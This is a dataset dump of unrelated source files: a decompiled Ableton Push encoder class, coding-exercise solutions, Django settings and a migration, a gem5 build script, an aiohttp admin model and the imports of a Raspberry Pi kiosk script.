Dataset schema (one row per source file):

| column | dtype | min | max |
|---|---|---|---|
| blob_id | string | 40 chars | 40 chars |
| directory_id | string | 40 chars | 40 chars |
| path | string | 3 chars | 616 chars |
| content_id | string | 40 chars | 40 chars |
| detected_licenses | sequence | 0 items | 112 items |
| license_type | string | 2 classes | |
| repo_name | string | 5 chars | 115 chars |
| snapshot_id | string | 40 chars | 40 chars |
| revision_id | string | 40 chars | 40 chars |
| branch_name | string | 777 classes | |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 | 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 | 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 | 2023-09-06 01:08:06 |
| github_id | int64 (nullable) | 4.92k | 681M |
| star_events_count | int64 | 0 | 209k |
| fork_events_count | int64 | 0 | 110k |
| gha_license_id | string | 22 classes | |
| gha_event_created_at | timestamp[us] (nullable) | 2012-06-04 01:52:49 | 2023-09-14 21:59:50 |
| gha_created_at | timestamp[us] (nullable) | 2008-05-22 07:58:19 | 2023-08-21 12:35:19 |
| gha_language | string | 149 classes | |
| src_encoding | string | 26 classes | |
| language | string | 1 value | |
| is_vendor | bool | 2 classes | |
| is_generated | bool | 2 classes | |
| length_bytes | int64 | 3 | 10.2M |
| extension | string | 188 classes | |
| content | string | 3 chars | 10.2M chars |
| authors | sequence | 1 item | 1 item |
| author_id | string | 1 char | 132 chars |
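The rows below follow this schema, with each record's `content` field holding one source file. A minimal sketch of consuming such a dataset, assuming the Hugging Face `datasets` library and a hypothetical dataset id ("example/stack-slice"), neither of which is named by this dump:

from datasets import load_dataset

# Stream rows so multi-megabyte `content` values are not loaded all at once.
ds = load_dataset("example/stack-slice", split="train", streaming=True)
for row in ds.take(1):
    print(row["repo_name"], row["path"], row["length_bytes"])
    print(row["content"][:200])  # first 200 characters of the file text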
# === File: Push2_MIDI_Scripts/decompiled 10.0.3b2 scripts/pushbase/touch_encoder_element.py | repo: intergalacticfm/Push2_MIDI_Scripts | license: none | encoding: UTF-8 ===

# uncompyle6 version 3.0.1
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.13 (default, Jan 19 2017, 14:48:08)
# [GCC 6.3.0 20170118]
# Embedded file name: c:\Jenkins\live\output\win_64_static\Release\python-bundle\MIDI Remote Scripts\pushbase\touch_encoder_element.py
# Compiled at: 2018-06-05 08:04:22
from __future__ import absolute_import, print_function, unicode_literals
from ableton.v2.control_surface.elements import TouchEncoderElement as TouchEncoderElementBase
class TouchEncoderObserver(object):
    u""" Interface for observing the state of one or more TouchEncoderElements """

    def on_encoder_touch(self, encoder):
        pass

    def on_encoder_parameter(self, encoder):
        pass


class TouchEncoderElement(TouchEncoderElementBase):
    u""" Class representing an encoder that is touch sensitive """

    def __init__(self, undo_step_handler=None, delete_handler=None, *a, **k):
        super(TouchEncoderElement, self).__init__(*a, **k)
        self._trigger_undo_step = False
        self._undo_step_open = False
        self._undo_step_handler = undo_step_handler
        self._delete_handler = delete_handler
        self.set_observer(None)
        return

    def set_observer(self, observer):
        if observer is None:
            observer = TouchEncoderObserver()
        self._observer = observer
        return

    def on_nested_control_element_value(self, value, control):
        self._trigger_undo_step = value
        if value:
            param = self.mapped_parameter()
            if self._delete_handler and self._delete_handler.is_deleting and param:
                self._delete_handler.delete_clip_envelope(param)
            else:
                self.begin_gesture()
                self._begin_undo_step()
                self._observer.on_encoder_touch(self)
                self.notify_touch_value(value)
        else:
            self._end_undo_step()
            self._observer.on_encoder_touch(self)
            self.notify_touch_value(value)
            self.end_gesture()

    def connect_to(self, parameter):
        if parameter != self.mapped_parameter():
            self.last_mapped_parameter = parameter
            super(TouchEncoderElement, self).connect_to(parameter)
            self._observer.on_encoder_parameter(self)

    def release_parameter(self):
        if self.mapped_parameter() != None:
            super(TouchEncoderElement, self).release_parameter()
            self._observer.on_encoder_parameter(self)
        return

    def receive_value(self, value):
        self._begin_undo_step()
        super(TouchEncoderElement, self).receive_value(value)

    def disconnect(self):
        super(TouchEncoderElement, self).disconnect()
        self._undo_step_handler = None
        return

    def _begin_undo_step(self):
        if self._undo_step_handler and self._trigger_undo_step:
            self._undo_step_handler.begin_undo_step()
            self._trigger_undo_step = False
            self._undo_step_open = True

    def _end_undo_step(self):
        if self._undo_step_handler and self._undo_step_open:
            self._undo_step_handler.end_undo_step()

# === File: 21-merge-two-sorted-lists.py | repo: dchentech/leetcode | license: MIT | encoding: UTF-8 ===

"""
Question:
Merge Two Sorted Lists
Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
Performance:
1. Total Accepted: 82513 Total Submissions: 250918 Difficulty: Easy
2. Your runtime beats 93.72% of python submissions.
"""
# Definition for singly-linked list.
class ListNode(object):
    def __init__(self, x):
        self.val = x
        self.next = None


class Solution(object):
    def mergeTwoLists(self, l1, l2):
        """
        :type l1: ListNode
        :type l2: ListNode
        :rtype: ListNode
        """
        # Make everything easy, just take the next at the end.
        dummy_head = ListNode(0)
        curr_node = dummy_head
        while l1 is not None and l2 is not None:
            if l1.val < l2.val:
                curr_node.next = l1
                l1 = l1.next
            else:
                curr_node.next = l2
                l2 = l2.next
            curr_node = curr_node.next
        curr_node.next = l1 or l2  # append the rest.
        return dummy_head.next
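
# Note (not in the original): the dummy head removes the empty-list special
# case, since every append goes through curr_node.next and the merged list
# starts at dummy_head.next. Runs in O(n + m) time and O(1) extra space,
# because nodes are relinked rather than copied.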
n1 = ListNode(1)
n2 = ListNode(2)
n3 = ListNode(3)
n4 = ListNode(4)
n5 = ListNode(5)
n6 = ListNode(6)
n7 = ListNode(7)
n8 = ListNode(8)
n1.next = n3
n3.next = n5
n5.next = n7
n2.next = n4
n4.next = n6
n6.next = n8
result = Solution().mergeTwoLists(n1, n2)
assert result is n1
assert n1.next is n2
assert n2.next is n3
assert n3.next is n4
assert n4.next is n5
assert n5.next is n6
assert n6.next is n7
assert n7.next is n8

# === File: DjangoApp/settings.py | repo: johnnynode/Django-1.11.11 | license: MIT | encoding: UTF-8 ===

"""
Django settings for DjangoApp project.
Generated by 'django-admin startproject' using Django 1.11.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r043d-2qjdi=r7gj4jifc-$)g--ar7q3@huxk5rr&4#vu-pg9s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['0.0.0.0']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app' # app.apps.AppConfig
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'DjangoApp.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'DjangoApp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'ENGINE': 'django.db.backends.mysql',
'NAME': 'mydb',
'USER': 'root',
'PASSWORD': '123456_mysql',
'HOST': 'localhost',
'PORT': '3306'
}
}
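# A hedged sketch (not part of the original settings): the hard-coded MySQL
# password above would normally come from the environment; `DB_PASSWORD` is a
# hypothetical variable name.
# DATABASES['default']['PASSWORD'] = os.environ.get('DB_PASSWORD', '')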
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'

# === File: src/python/SConscript | repo: H2020-COSSIM/cgem5 | licenses: BSD-3-Clause, LGPL-2.0-or-later, MIT, proprietary | encoding: UTF-8 ===

# -*- mode:python -*-
# Copyright (c) 2004-2005 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
Import('*')
PySource('gem5', 'gem5/__init__.py')
PySource('gem5', 'gem5/coherence_protocol.py')
PySource('gem5', 'gem5/isas.py')
PySource('gem5', 'gem5/runtime.py')
PySource('gem5.simulate', 'gem5/simulate/__init__.py')
PySource('gem5.simulate', 'gem5/simulate/simulator.py')
PySource('gem5.simulate', 'gem5/simulate/exit_event.py')
PySource('gem5.simulate', 'gem5/simulate/exit_event_generators.py')
PySource('gem5.components', 'gem5/components/__init__.py')
PySource('gem5.components.boards', 'gem5/components/boards/__init__.py')
PySource('gem5.components.boards', 'gem5/components/boards/abstract_board.py')
PySource('gem5.components.boards',
'gem5/components/boards/abstract_system_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/mem_mode.py')
PySource('gem5.components.boards', 'gem5/components/boards/riscv_board.py')
PySource('gem5.components.boards.experimental',
'gem5/components/boards/experimental/__init__.py')
PySource('gem5.components.boards.experimental',
'gem5/components/boards/experimental/lupv_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/simple_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/test_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/x86_board.py')
PySource('gem5.components.boards', 'gem5/components/boards/arm_board.py')
PySource('gem5.components.boards',
"gem5/components/boards/kernel_disk_workload.py")
PySource('gem5.components.boards',
"gem5/components/boards/se_binary_workload.py")
PySource('gem5.components.cachehierarchies',
'gem5/components/cachehierarchies/__init__.py')
PySource('gem5.components.cachehierarchies',
'gem5/components/cachehierarchies/abstract_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies',
'gem5/components/cachehierarchies/abstract_two_level_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.chi',
'gem5/components/cachehierarchies/chi/__init__.py')
PySource('gem5.components.cachehierarchies.chi',
'gem5/components/cachehierarchies/chi/private_l1_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/__init__.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/abstract_node.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/directory.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/dma_requestor.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/private_l1_moesi_cache.py')
PySource('gem5.components.cachehierarchies.chi.nodes',
'gem5/components/cachehierarchies/chi/nodes/memory_controller.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/__init__.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/'
'abstract_classic_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/no_cache.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/private_l1_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/'
'private_l1_private_l2_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.classic',
'gem5/components/cachehierarchies/classic/'
'private_l1_shared_l2_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/__init__.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/l1dcache.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/l1icache.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/l2cache.py')
PySource('gem5.components.cachehierarchies.classic.caches',
'gem5/components/cachehierarchies/classic/caches/mmu_cache.py')
PySource('gem5.components.cachehierarchies.ruby',
'gem5/components/cachehierarchies/ruby/__init__.py')
PySource('gem5.components.cachehierarchies.ruby',
'gem5/components/cachehierarchies/ruby/abstract_ruby_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.ruby',
'gem5/components/cachehierarchies/ruby/mesi_two_level_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.ruby',
'gem5/components/cachehierarchies/ruby/mi_example_cache_hierarchy.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/__init__.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/abstract_directory.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/abstract_dma_controller.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/abstract_l1_cache.py')
PySource('gem5.components.cachehierarchies.ruby.caches',
'gem5/components/cachehierarchies/ruby/caches/abstract_l2_cache.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/__init__.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/directory.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/'
'dma_controller.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/l1_cache.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mesi_two_level',
'gem5/components/cachehierarchies/ruby/caches/mesi_two_level/l2_cache.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mi_example',
'gem5/components/cachehierarchies/ruby/caches/mi_example/__init__.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mi_example',
'gem5/components/cachehierarchies/ruby/caches/mi_example/directory.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mi_example',
'gem5/components/cachehierarchies/ruby/caches/mi_example/'
'dma_controller.py')
PySource('gem5.components.cachehierarchies.ruby.caches.mi_example',
'gem5/components/cachehierarchies/ruby/caches/mi_example/l1_cache.py')
PySource('gem5.components.cachehierarchies.ruby.topologies',
'gem5/components/cachehierarchies/ruby/topologies/__init__.py')
PySource('gem5.components.cachehierarchies.ruby.topologies',
'gem5/components/cachehierarchies/ruby/topologies/simple_pt2pt.py')
PySource('gem5.components.memory', 'gem5/components/memory/__init__.py')
PySource('gem5.components.memory', 'gem5/components/memory/abstract_memory_system.py')
PySource('gem5.components.memory', 'gem5/components/memory/dramsim_3.py')
PySource('gem5.components.memory', 'gem5/components/memory/simple.py')
PySource('gem5.components.memory', 'gem5/components/memory/memory.py')
PySource('gem5.components.memory', 'gem5/components/memory/single_channel.py')
PySource('gem5.components.memory', 'gem5/components/memory/multi_channel.py')
PySource('gem5.components.memory', 'gem5/components/memory/hbm.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/__init__.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/ddr3.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/ddr4.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/gddr.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/hbm.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/hmc.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/lpddr2.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/lpddr3.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/lpddr5.py')
PySource('gem5.components.memory.dram_interfaces',
'gem5/components/memory/dram_interfaces/wideio.py')
PySource('gem5.components.processors',
'gem5/components/processors/__init__.py')
PySource('gem5.components.processors',
'gem5/components/processors/abstract_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/abstract_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/abstract_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/abstract_processor.py')
PySource('gem5.components.processors',
'gem5/components/processors/complex_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/complex_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/cpu_types.py')
PySource('gem5.components.processors',
'gem5/components/processors/gups_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/gups_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/gups_generator_ep.py')
PySource('gem5.components.processors',
'gem5/components/processors/gups_generator_par.py')
PySource('gem5.components.processors',
'gem5/components/processors/linear_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/linear_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/random_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/random_generator.py')
PySource('gem5.components.processors',
'gem5/components/processors/simple_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/base_cpu_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/simple_processor.py')
PySource('gem5.components.processors',
'gem5/components/processors/base_cpu_processor.py')
PySource('gem5.components.processors',
'gem5/components/processors/simple_switchable_processor.py')
PySource('gem5.components.processors',
'gem5/components/processors/switchable_processor.py')
PySource('gem5.utils', 'gem5/utils/simpoint.py')
PySource('gem5.components.processors',
'gem5/components/processors/traffic_generator_core.py')
PySource('gem5.components.processors',
'gem5/components/processors/traffic_generator.py')
PySource('gem5.prebuilt', 'gem5/prebuilt/__init__.py')
PySource('gem5.prebuilt.demo', 'gem5/prebuilt/demo/__init__.py')
PySource('gem5.prebuilt.demo', 'gem5/prebuilt/demo/x86_demo_board.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/__init__.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/riscvmatched_board.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/riscvmatched_cache.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/riscvmatched_processor.py')
PySource('gem5.prebuilt.riscvmatched',
'gem5/prebuilt/riscvmatched/riscvmatched_core.py')
PySource('gem5.resources', 'gem5/resources/__init__.py')
PySource('gem5.resources', 'gem5/resources/downloader.py')
PySource('gem5.resources', 'gem5/resources/md5_utils.py')
PySource('gem5.resources', 'gem5/resources/resource.py')
PySource('gem5.resources', 'gem5/resources/workload.py')
PySource('gem5.utils', 'gem5/utils/__init__.py')
PySource('gem5.utils', 'gem5/utils/filelock.py')
PySource('gem5.utils', 'gem5/utils/override.py')
PySource('gem5.utils', 'gem5/utils/requires.py')
PySource('gem5.utils.multiprocessing',
'gem5/utils/multiprocessing/__init__.py')
PySource('gem5.utils.multiprocessing',
'gem5/utils/multiprocessing/_command_line.py')
PySource('gem5.utils.multiprocessing',
'gem5/utils/multiprocessing/context.py')
PySource('gem5.utils.multiprocessing',
'gem5/utils/multiprocessing/popen_spawn_gem5.py')
PySource('', 'importer.py')
PySource('m5', 'm5/__init__.py')
PySource('m5', 'm5/SimObject.py')
PySource('m5', 'm5/core.py')
PySource('m5', 'm5/debug.py')
PySource('m5', 'm5/event.py')
PySource('m5', 'm5/main.py')
PySource('m5', 'm5/options.py')
PySource('m5', 'm5/params.py')
PySource('m5', 'm5/proxy.py')
PySource('m5', 'm5/simulate.py')
PySource('m5', 'm5/ticks.py')
PySource('m5', 'm5/trace.py')
PySource('m5.objects', 'm5/objects/__init__.py')
PySource('m5.stats', 'm5/stats/__init__.py')
PySource('m5.util', 'm5/util/__init__.py')
PySource('m5.util', 'm5/util/attrdict.py')
PySource('m5.util', 'm5/util/convert.py')
PySource('m5.util', 'm5/util/dot_writer.py')
PySource('m5.util', 'm5/util/dot_writer_ruby.py')
PySource('m5.util', 'm5/util/fdthelper.py')
PySource('m5.util', 'm5/util/multidict.py')
PySource('m5.util', 'm5/util/pybind.py')
PySource('m5.util', 'm5/util/terminal.py')
PySource('m5.util', 'm5/util/terminal_formatter.py')
PySource('m5.internal', 'm5/internal/__init__.py')
PySource('m5.internal', 'm5/internal/params.py')
PySource('m5.ext', 'm5/ext/__init__.py')
PySource('m5.ext.pyfdt', 'm5/ext/pyfdt/pyfdt.py')
PySource('m5.ext.pyfdt', 'm5/ext/pyfdt/__init__.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/__init__.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/serializable_stat.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/abstract_stat.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/group.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/simstat.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/statistic.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/storagetype.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/timeconversion.py')
PySource('m5.ext.pystats', 'm5/ext/pystats/jsonloader.py')
PySource('m5.stats', 'm5/stats/gem5stats.py')
Source('embedded.cc', add_tags=['python', 'm5_module'])
Source('importer.cc', add_tags=['python', 'm5_module'])
cc, hh = env.Blob('m5ImporterCode', 'importer.py')
Source(cc, add_tags=['python', 'm5_module'])
Source('pybind11/core.cc', add_tags='python')
Source('pybind11/debug.cc', add_tags='python')
Source('pybind11/event.cc', add_tags='python')
Source('pybind11/object_file.cc', add_tags='python')
Source('pybind11/stats.cc', add_tags='python')
SimObject('m5/objects/SimObject.py', sim_objects=['SimObject'],
enums=['ByteOrder'])
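
# Orientation note (not part of the original SConscript): in gem5's build,
# PySource(package, path) embeds a Python file under the given package,
# Source(path) adds a C++ file to the build, and SimObject(path, ...) embeds
# the file and generates wrappers for the SimObjects and enums it declares.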

# === File: demos/blog_react/aiohttpdemo_blog/admin/posts.py | repo: Deniallugo/aiohttp_admin | license: Apache-2.0 | encoding: UTF-8 ===

from aiohttp_admin.contrib import models
from aiohttp_admin.backends.sa import PGResource
from .main import schema
from ..db import post
@schema.register
class Posts(models.ModelAdmin):
fields = ('id', 'title', 'pictures', 'backlinks', 'subcategory',)
class Meta:
resource_type = PGResource
table = post
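
# Registration note (not part of the original file): `@schema.register`
# exposes this table in the admin UI; `fields` selects the visible columns
# and `Meta` binds the model to the PGResource backend over the SQLAlchemy
# `post` table imported above.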

# === File: crimtech_final_project/crimsononline/newsletter/migrations/0004_auto_20160321_1749.py | repo: cindyz8735/crimtechcomp | license: none | encoding: UTF-8 ===

# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0003_auto_20150826_0229'),
]
operations = [
migrations.CreateModel(
name='HarvardTodaySponsoredEvent',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('time', models.CharField(default=b'', max_length=20)),
('description', models.TextField(default=b'')),
],
),
migrations.AddField(
model_name='harvardtodaynewsletter',
name='others_list',
field=models.TextField(default=b'', blank=True),
),
migrations.AddField(
model_name='harvardtodaysponsoredevent',
name='newsletter',
field=models.ForeignKey(related_name='sponsored_events', to='newsletter.HarvardTodayNewsletter'),
),
]

# === File: 2021_하반기 코테연습/boj14620.py | repo: holim0/Algo_Study | license: none | encoding: UTF-8 ===

n = int(input())
mapp = []
for _ in range(n):
tmp = list(map(int, input().split()))
mapp.append(tmp)
check = [[False for _ in range(n)] for _ in range(n)]
answer = 1e10
dx = [1, -1, 0, 0]
dy = [0, 0, -1, 1]
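# Problem note (not in the original): BOJ 14620 asks to plant three
# plus-shaped flowers on the n x n cost grid without overlap and minimize the
# total cost; getSol below backtracks over every valid centre, marking the
# four neighbours via dx/dy and unmarking them after the recursive call.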
def check_range(x, y):
if x>=0 and x<n and y>=0 and y<n:
return True
return False
def check_find(x, y):
global dx, dy
for i in range(4):
nx, ny = x+dx[i], y+dy[i]
if not check_range(nx, ny) or check[nx][ny]:
return False
return True
def get_sum(x, y):
global dx, dy
s = mapp[x][y]
for i in range(4):
nx, ny = x+dx[i], y+dy[i]
s+=mapp[nx][ny]
return s
def getSol(cur, cnt):
global answer, dx, dy
if cnt==3:
answer = min(answer, cur)
return
for i in range(n):
for j in range(n):
if not check[i][j] and check_find(i, j):
tmp= mapp[i][j]
for k in range(4):
nx, ny = i+dx[k], j+dy[k]
check[nx][ny] = True
tmp+=mapp[nx][ny]
getSol(cur+tmp, cnt+1)
for k in range(4):
nx, ny = i+dx[k], j+dy[k]
check[nx][ny] = False
getSol(0, 0)
print(answer)

# === File: iniciante/Mundo 02/Exercícios Corrigidos/Exercício 036.py | repo: ggsant/pyladies | license: MIT | encoding: UTF-8 ===

"""
EXERCISE 036: Approving a Loan
Write a program to approve a bank loan for the purchase of a house.
Ask for the price of the house, the buyer's salary, and over how many years it will be paid.
The monthly installment cannot exceed 30% of the salary, or else the loan will be denied.
"""
casa = float(input('Valor da casa: R$ '))
salario = float(input('Salário do comprador: R$ '))
anos = int(input('Quantos anos de financiamento? '))
prestacao = casa / (anos * 12)
minimo = salario * 30 / 100
print('Para pagar uma casa de R$ {:.2f} em {} anos,'.format(casa, anos), end=' ')
print('a prestação será de R$ {:.2f}.'.format(prestacao))
if prestacao <= minimo:
print('Empréstimo pode ser CONCEDIDO!')
else:
print('Empréstimo NEGADO!')
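# Worked example (not in the original): a R$ 240000.00 house financed over 20
# years gives 240000 / (20 * 12) = R$ 1000.00 per month, approved only if the
# buyer earns at least R$ 3333.34, since 30% of that salary covers the payment.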

# === File: introd/programas/cap01_prob/exemp_cap_01_01_c.py | repo: ernestojfcosta/IPRP_LIVRO_2013_06 | license: none | encoding: WINDOWS-1257 (file declares mac-roman) ===

# -*- coding: mac-roman -*-
# Simple example of inputs / outputs / assignments
# Ernesto Costa
# Given the height, computes the ideal weight for a person
def main():
    """ Do they have the ideal weight?
    """
    # prompt the user
    altura = input("A sua altura por favor: ")
    sexo = raw_input("O seu sexo por favor (M / F): ")
    if sexo == 'M':
        peso_ideal = 72.7 * altura - 58
    else:
        peso_ideal = 62.1 * altura - 44.7
    print "O seu peso ideal e ", peso_ideal, "kilos"
main()
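# Worked example (not in the original): for a height of 1.80, the male formula
# gives 72.7 * 1.80 - 58 = 72.86 kilos and the female formula gives
# 62.1 * 1.80 - 44.7 = 67.08 kilos.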

# === File: home/pi/antes/cstart1.py | repo: mcashjavier/disco-linux-raspy | license: none | encoding: UTF-8 ===

#!/usr/bin/python3
import threading
#qr
import pyqrcode
from gpiozero import CPUTemperature
from tkinter import *
from tkinter.font import Font
import subprocess
import socket
import sys
import os
import json
import serial
import binascii
import pygame
import webbrowser
import io
from datetime import datetime,timedelta
import time
global tarjetalista
global controlluces
global rojo_dos_mundos
global UltTar
global infoObject
global screen
global acumulador
global SinNada
global EntrarTimer
global qcolor
global TimeOut
global llego1
global EnvioPuerto
global ConfirmacionCoin
global ConfirmacionTarjeta
global confirmacionMudo
global LabelPase
global LabelPagando
global LabelPago
#global sock
global MiIp
